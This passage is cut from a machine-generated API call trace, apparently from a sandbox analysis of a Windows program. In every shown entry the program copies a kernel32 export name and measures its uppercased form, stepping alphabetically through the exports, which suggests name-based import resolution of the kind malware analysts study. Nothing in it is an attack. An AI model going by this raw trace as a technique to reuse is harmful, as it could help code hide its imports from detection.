(in: lpString1=0x392eef0, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0179.263] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0179.263] lstrcpyA (in: lpString1=0x392eef0, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0179.263] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0179.263] lstrcpyA (in: lpString1=0x392eef0, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0179.263] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0179.263] lstrcpyA (in: lpString1=0x392eef0, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0179.263] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0179.263] lstrcpyA (in: lpString1=0x392eef0, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0179.263] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0179.263] lstrcpyA (in: lpString1=0x392eef0, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0179.263] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0179.263] lstrcpyA (in: lpString1=0x392eef0, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0179.263] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0179.264] lstrcpyA (in: lpString1=0x392eef0, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0179.264] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0179.264] lstrcpyA (in: lpString1=0x392eef0, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0179.264] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0179.264] lstrcpyA (in: lpString1=0x392eef0, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0179.264] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0179.264] lstrcpyA (in: lpString1=0x392eef0, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0179.264] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0179.264] lstrcpyA (in: lpString1=0x392eef0, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0179.264] lstrlenA (lpString="BACKUPREAD") returned 10 [0179.264] lstrcpyA (in: lpString1=0x392eef0, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0179.264] lstrlenA (lpString="BACKUPSEEK") returned 10 [0179.264] lstrcpyA (in: lpString1=0x392eef0, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0179.264] lstrlenA (lpString="BACKUPWRITE") returned 11 [0179.264] lstrcpyA (in: lpString1=0x392eef0, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0179.264] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0179.264] lstrcpyA (in: lpString1=0x392eef0, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0179.264] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0179.264] lstrcpyA (in: lpString1=0x392eef0, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0179.264] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0179.264] lstrcpyA (in: lpString1=0x392eef0, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0179.264] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0179.264] lstrcpyA (in: lpString1=0x392eef0, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0179.264] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0179.264] lstrcpyA (in: lpString1=0x392eef0, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0179.264] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0179.264] lstrcpyA (in: lpString1=0x392eef0, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0179.264] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0179.264] lstrcpyA (in: lpString1=0x392eef0, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0179.264] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0179.264] lstrcpyA (in: lpString1=0x392eef0, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0179.264] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0179.264] lstrcpyA (in: lpString1=0x392eef0, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0179.264] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0179.264] lstrcpyA (in: lpString1=0x392eef0, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0179.264] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0179.264] lstrcpyA (in: lpString1=0x392eef0, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0179.265] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0179.265] lstrcpyA (in: lpString1=0x392eef0, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0179.265] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0179.265] lstrcpyA (in: lpString1=0x392eef0, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0179.265] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0179.265] lstrcpyA (in: lpString1=0x392eef0, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0179.265] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0179.265] lstrcpyA (in: lpString1=0x392eef0, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0179.265] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0179.265] lstrcpyA (in: lpString1=0x392eef0, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0179.265] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0179.265] lstrcpyA (in: lpString1=0x392eef0, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0179.265] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0179.265] lstrcpyA (in: lpString1=0x392eef0, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0179.265] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0179.265] lstrcpyA (in: lpString1=0x392eef0, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0179.265] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0179.265] lstrcpyA (in: lpString1=0x392eef0, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0179.265] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0179.265] lstrcpyA (in: lpString1=0x392eef0, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0179.265] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0179.265] lstrcpyA (in: lpString1=0x392eef0, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0179.265] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0179.265] lstrcpyA (in: lpString1=0x392eef0, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0179.265] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0179.265] lstrcpyA (in: lpString1=0x392eef0, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0179.265] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0179.265] lstrcpyA (in: lpString1=0x392eef0, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0179.265] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0179.265] lstrcpyA (in: lpString1=0x392eef0, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0179.265] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0179.265] lstrcpyA (in: lpString1=0x392eef0, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0179.265] lstrlenA (lpString="BEEP") returned 4 [0179.265] lstrcpyA (in: lpString1=0x392eef0, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0179.265] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0179.265] lstrcpyA (in: lpString1=0x392eef0, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0179.265] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0179.266] lstrcpyA (in: lpString1=0x392eef0, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0179.266] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0179.266] lstrcpyA (in: lpString1=0x392eef0, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0179.266] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0179.266] lstrcpyA (in: lpString1=0x392eef0, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0179.266] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0179.266] lstrcpyA (in: lpString1=0x392eef0, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0179.266] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0179.266] lstrcpyA (in: lpString1=0x392eef0, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0179.266] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0179.266] lstrcpyA (in: lpString1=0x392eef0, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0179.266] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0179.266] lstrcpyA (in: lpString1=0x392eef0, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0179.266] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0179.266] lstrcpyA (in: lpString1=0x392eef0, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0179.266] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0179.266] lstrcpyA (in: lpString1=0x392eef0, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0179.266] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0179.266] lstrcpyA (in: lpString1=0x392eef0, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0179.266] lstrlenA (lpString="CANCELIO") returned 8 [0179.266] lstrcpyA (in: lpString1=0x392eef0, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0179.266] lstrlenA (lpString="CANCELIOEX") returned 10 [0179.266] lstrcpyA (in: lpString1=0x392eef0, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0179.266] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0179.266] lstrcpyA (in: lpString1=0x392eef0, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0179.266] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0179.266] lstrcpyA (in: lpString1=0x392eef0, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0179.266] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0179.266] lstrcpyA (in: lpString1=0x392eef0, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0179.266] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0179.266] lstrcpyA (in: lpString1=0x392eef0, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0179.266] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0179.266] lstrcpyA (in: lpString1=0x392eef0, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0179.266] lstrlenA (lpString="CHECKELEVATION") returned 14 [0179.266] lstrcpyA (in: lpString1=0x392eef0, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0179.266] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0179.266] lstrcpyA (in: lpString1=0x392eef0, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0179.267] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0179.267] lstrcpyA (in: lpString1=0x392eef0, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0179.267] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0179.267] lstrcpyA (in: lpString1=0x392eef0, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0179.267] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0179.267] lstrcpyA (in: lpString1=0x392eef0, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0179.267] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0179.267] lstrcpyA (in: lpString1=0x392eef0, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0179.267] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0179.267] lstrcpyA (in: lpString1=0x392eef0, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0179.267] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0179.267] lstrcpyA (in: lpString1=0x392eef0, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0179.267] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0179.267] lstrcpyA (in: lpString1=0x392eef0, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0179.267] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0179.267] lstrcpyA (in: lpString1=0x392eef0, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0179.267] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0179.267] lstrcpyA (in: lpString1=0x392eef0, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0179.267] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0179.267] lstrcpyA (in: lpString1=0x392eef0, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0179.267] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0179.267] lstrcpyA (in: lpString1=0x392eef0, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0179.267] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0179.267] lstrcpyA (in: lpString1=0x392eef0, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0179.267] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0179.267] lstrcpyA (in: lpString1=0x392eef0, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0179.267] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0179.267] lstrcpyA (in: lpString1=0x392eef0, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0179.267] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0179.267] lstrcpyA (in: lpString1=0x392eef0, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0179.267] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0179.267] lstrcpyA (in: lpString1=0x392eef0, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0179.267] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0179.267] lstrcpyA (in: lpString1=0x392eef0, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0179.267] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0179.267] lstrcpyA (in: lpString1=0x392eef0, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0179.267] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0179.267] lstrcpyA (in: lpString1=0x392eef0, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0179.268] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0179.268] lstrcpyA (in: lpString1=0x392eef0, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0179.268] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0179.268] lstrcpyA (in: lpString1=0x392eef0, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0179.268] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0179.268] lstrcpyA (in: lpString1=0x392eef0, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0179.268] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0179.268] lstrcpyA (in: lpString1=0x392eef0, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0179.268] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0179.268] lstrcpyA (in: lpString1=0x392eef0, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0179.268] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0179.268] lstrcpyA (in: lpString1=0x392eef0, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0179.268] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0179.268] lstrcpyA (in: lpString1=0x392eef0, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0179.268] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0179.268] lstrcpyA (in: lpString1=0x392eef0, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0179.268] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0179.268] lstrcpyA (in: lpString1=0x392eef0, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0179.268] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0179.268] lstrcpyA (in: lpString1=0x392eef0, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0179.268] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0179.268] lstrcpyA (in: lpString1=0x392eef0, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0179.268] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0179.268] lstrcpyA (in: lpString1=0x392eef0, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0179.268] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0179.268] lstrcpyA (in: lpString1=0x392eef0, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0179.268] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0179.268] lstrcpyA (in: lpString1=0x392eef0, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0179.268] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0179.268] lstrcpyA (in: lpString1=0x392eef0, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0179.268] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0179.268] lstrcpyA (in: lpString1=0x392eef0, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0179.268] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0179.268] lstrcpyA (in: lpString1=0x392eef0, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0179.268] lstrlenA (lpString="COPYCONTEXT") returned 11 [0179.268] lstrcpyA (in: lpString1=0x392eef0, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0179.269] lstrlenA (lpString="COPYFILEA") returned 9 [0179.269] lstrcpyA (in: lpString1=0x392eef0, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0179.269] lstrlenA (lpString="COPYFILEEXA") returned 11 [0179.269] lstrcpyA (in: lpString1=0x392eef0, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0179.269] lstrlenA (lpString="COPYFILEEXW") returned 11 [0179.269] lstrcpyA (in: lpString1=0x392eef0, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0179.269] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0179.269] lstrcpyA (in: lpString1=0x392eef0, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0179.269] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0179.269] lstrcpyA (in: lpString1=0x392eef0, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0179.269] lstrlenA (lpString="COPYFILEW") returned 9 [0179.269] lstrcpyA (in: lpString1=0x392eef0, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0179.269] lstrlenA (lpString="COPYLZFILE") returned 10 [0179.269] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0179.269] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0179.269] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0179.269] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0179.269] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0179.269] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0179.269] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0179.269] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0179.269] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0179.269] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0179.269] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0179.269] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0179.269] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0179.269] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0179.269] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0179.269] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0179.269] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0179.269] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0179.269] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0179.269] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0179.269] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0179.269] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0179.269] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0179.269] lstrlenA (lpString="CREATEEVENTA") returned 12 [0179.270] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0179.270] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0179.270] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0179.270] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0179.270] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0179.270] lstrlenA (lpString="CREATEEVENTW") returned 12 [0179.270] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0179.270] lstrlenA (lpString="CREATEFIBER") returned 11 [0179.270] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0179.270] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0179.270] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0179.270] lstrlenA (lpString="CREATEFILEA") returned 11 [0179.270] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0179.270] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0179.270] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0179.270] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0179.270] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateFileMappingNumaW" | out: 